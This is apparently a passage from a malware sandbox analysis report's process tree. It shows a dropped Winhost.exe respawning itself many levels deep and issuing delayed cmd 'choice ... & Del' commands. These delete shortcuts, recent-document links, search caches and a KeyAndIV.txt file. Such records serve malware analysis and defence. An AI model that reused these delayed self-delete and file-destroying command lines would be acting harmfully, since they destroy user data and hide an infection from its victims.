    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk"
        5⤵
        
        PID:18424
      - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        6⤵
        
        PID:18036
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Microsoft Edge.lnk"
        5⤵
        
        PID:1356
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Shows Desktop.lnk"
        5⤵
        
        PID:18440
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Window Switcher.lnk"
        5⤵
        
        PID:18452
      - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        6⤵
        
        PID:17788
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\Are.docx.lnk"
        5⤵
        
        PID:18464
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\Files.docx.lnk"
        5⤵
        
        PID:18476
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\Opened.docx.lnk"
        5⤵
        
        PID:18488
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\Recently.docx.lnk"
        5⤵
        
        PID:18500
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\These.docx.lnk"
        5⤵
        
        PID:18512
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\Fax Recipient.lnk"
        5⤵
        
        PID:18524
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Microsoft Edge.lnk"
        5⤵
        
        PID:18536
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\images\blurrect.png"
        5⤵
        
        PID:18548
    - - C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        5⤵
        Executes dropped EXE
        
        PID:18576
      - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        6⤵
        
        PID:17764
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        7⤵
        
        PID:17392
      - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133589146296706483.txt"
        6⤵
        
        PID:17796
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        7⤵
        
        PID:17612
      - C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:17812
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        7⤵
        
        PID:18220
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        8⤵
        
        PID:19120
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133589146296706483.txt"
        7⤵
        
        PID:13492
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        8⤵
        
        PID:17772
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{30a20fff-ed83-40d6-99c1-7475de83c912}\0.0.filtertrie.intermediate.txt"
        7⤵
        
        PID:19132
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        8⤵
        
        PID:13960
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{30a20fff-ed83-40d6-99c1-7475de83c912}\0.1.filtertrie.intermediate.txt"
        7⤵
        
        PID:17728
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        8⤵
        
        PID:17604
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{30a20fff-ed83-40d6-99c1-7475de83c912}\0.2.filtertrie.intermediate.txt"
        7⤵
        
        PID:14112
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        8⤵
        
        PID:17720
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        7⤵
        Executes dropped EXE
        
        PID:18232
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{30a20fff-ed83-40d6-99c1-7475de83c912}\0.0.filtertrie.intermediate.txt"
        8⤵
        
        PID:19316
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        9⤵
        
        PID:17508
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{30a20fff-ed83-40d6-99c1-7475de83c912}\0.1.filtertrie.intermediate.txt"
        8⤵
        
        PID:19356
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        9⤵
        
        PID:18352
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{30a20fff-ed83-40d6-99c1-7475de83c912}\0.2.filtertrie.intermediate.txt"
        8⤵
        
        PID:19008
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        9⤵
        
        PID:17296
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        8⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:17504
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        
        PID:18464
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        9⤵
        
        PID:13344
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        10⤵
        
        PID:3444
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{30a20fff-ed83-40d6-99c1-7475de83c912}\0.1.filtertrie.intermediate.txt"
        9⤵
        
        PID:13372
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        10⤵
        
        PID:14064
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        9⤵
        Executes dropped EXE
        
        PID:13912
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        10⤵
        
        PID:13892
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        11⤵
        
        PID:14328
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"
        10⤵
        
        PID:13860
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        11⤵
        
        PID:14204
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        10⤵
        Executes dropped EXE
        
        PID:2692
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        11⤵
        
        PID:17364
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        12⤵
        
        PID:4812
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"
        11⤵
        
        PID:13988
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        12⤵
        
        PID:18904
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        11⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:14200
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        12⤵
        
        PID:14828
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        13⤵
        
        PID:19444
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        12⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:17800
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        13⤵
        
        PID:548
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        14⤵
        
        PID:14220
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        13⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:14224
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        14⤵
        
        PID:5188
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        15⤵
        
        PID:11088
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        14⤵
        Executes dropped EXE
        
        PID:12400
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        15⤵
        Executes dropped EXE
        
        PID:5272
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        16⤵
        
        PID:10568
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        17⤵
        
        PID:8524
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        16⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:10284
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        17⤵
        
        PID:4348
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        18⤵
        
        PID:6732
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        17⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4748
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        18⤵
        
        PID:10424
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        19⤵
        
        PID:3732
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        18⤵
        Executes dropped EXE
        
        PID:1368
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        19⤵
        
        PID:5680
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        20⤵
        
        PID:3752
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        19⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:2552
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        20⤵
        
        PID:14324
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        21⤵
        
        PID:11796
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        20⤵
        Executes dropped EXE
        
        PID:2396
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        21⤵
        
        PID:3004
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        22⤵
        
        PID:2032
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        21⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4308
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        22⤵
        
        PID:5604
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        23⤵
        
        PID:5592
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        22⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3144
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        23⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3832
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        24⤵
        
        PID:15348
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        25⤵
        
        PID:15080
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133589146592374518.txt"
        24⤵
        
        PID:4936
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        25⤵
        
        PID:14844
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        24⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:1416
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        25⤵
        
        PID:14856
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        26⤵
        
        PID:10396
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133589146592374518.txt"
        25⤵
        
        PID:16320
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        26⤵
        
        PID:4780
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        25⤵
        Executes dropped EXE
        
        PID:16468
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        26⤵
        
        PID:4636
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        27⤵
        
        PID:15324
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133589146592374518.txt"
        26⤵
        
        PID:4596
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        27⤵
        
        PID:5060
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        26⤵
        Executes dropped EXE
        
        PID:14948
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        27⤵
        
        PID:14476
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        28⤵
        
        PID:15004
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        27⤵
        Executes dropped EXE
        
        PID:15104
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        28⤵
        Executes dropped EXE
        
        PID:15604
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        29⤵
        
        PID:14364
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        30⤵
        
        PID:15384
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        29⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:15644
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        30⤵
        
        PID:18732
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        31⤵
        
        PID:388
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        30⤵
        Executes dropped EXE
        
        PID:15448
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        31⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:16504
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        32⤵
        
        PID:16260
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        33⤵
        
        PID:4676
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        32⤵
        Executes dropped EXE
        
        PID:17028
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        33⤵
        
        PID:15648
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        34⤵
        
        PID:17760
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        33⤵
        Executes dropped EXE
        
        PID:2912
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        34⤵
        
        PID:15120
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        35⤵
        
        PID:15792
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        34⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:15944
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        35⤵
        
        PID:14556
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        36⤵
        
        PID:15884
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        35⤵
        Executes dropped EXE
        
        PID:16224
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        36⤵
        
        PID:16092
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        37⤵
        
        PID:15220
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        36⤵
        Executes dropped EXE
        
        PID:15980
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        37⤵
        
        PID:15392
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        38⤵
        
        PID:14716
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        37⤵
        Executes dropped EXE
        
        PID:15224
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        38⤵
        
        PID:16376
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        39⤵
        
        PID:16312
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        38⤵
        Executes dropped EXE
        
        PID:15504
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        39⤵
        Executes dropped EXE
        
        PID:16272
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        40⤵
        
        PID:4456
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        41⤵
        
        PID:8
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"
        40⤵
        
        PID:14628
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        41⤵
        
        PID:14652
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        40⤵
        Executes dropped EXE
        
        PID:14400
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        41⤵
        
        PID:1812
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        42⤵
        
        PID:14668
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"
        41⤵
        
        PID:15440
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        42⤵
        
        PID:15492
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        41⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:15432
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        42⤵
        Executes dropped EXE
        
        PID:7032
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        43⤵
        
        PID:9996
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        44⤵
        
        PID:7572
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        43⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:11656
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        44⤵
        
        PID:5416
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        45⤵
        
        PID:8012
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        44⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:7672
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        45⤵
        
        PID:5168
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        46⤵
        
        PID:11916
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        45⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:11192
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        46⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:9068
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        47⤵
        
        PID:11240
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        48⤵
        
        PID:11496
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        47⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:13280
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        48⤵
        
        PID:5772
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        49⤵
        
        PID:8684
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        48⤵
        Executes dropped EXE
        
        PID:12292
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        49⤵
        
        PID:7668
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        50⤵
        
        PID:7996
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
